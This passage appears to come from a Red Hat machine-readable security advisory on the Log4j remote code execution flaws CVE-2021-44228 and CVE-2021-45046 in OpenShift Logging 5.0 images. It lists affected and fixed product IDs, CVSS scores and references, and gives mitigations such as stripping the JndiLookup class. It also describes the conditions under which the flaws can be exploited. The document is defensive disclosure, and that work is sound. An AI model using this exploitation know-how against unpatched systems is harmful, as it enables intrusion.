"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:36:36+00:00",
"details": "For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nFor Red Hat OpenShift Logging 5.0, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5137"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:36:36+00:00",
"details": "For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nFor Red Hat OpenShift Logging 5.0, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5137"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
